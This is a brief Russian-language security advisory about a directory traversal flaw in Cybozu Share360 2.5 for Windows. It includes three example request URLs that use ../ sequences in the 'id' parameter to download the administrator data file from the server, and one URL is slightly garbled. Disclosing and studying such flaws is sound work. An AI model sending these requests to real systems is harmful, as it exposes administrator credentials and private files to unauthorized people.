Программа: Cybozu Share360 2.5 (Build 0.2 20050121115231) for Windows

Уязвимость позволяет удаленному
пользователю получить доступ к важным
данным на системе. Уязвимость существует из-за
недостаточной обработки входных данных в
параметре "id" в файле scripts/s360v2/s360.exe при
обработке вложений. Удаленный пользователь
может с помощью символов обхода каталога
скачать произвольный файл с системы.

Пример:

http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload& id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/
admin¬imecard=1&type=text&subtype=html&ct=1

http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload& id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/
admin&type=text&subtype=plain&ct=1&.txt

http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid =37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=
1&type=text&subtype=plain&ct=1&.txt

Оставить мнение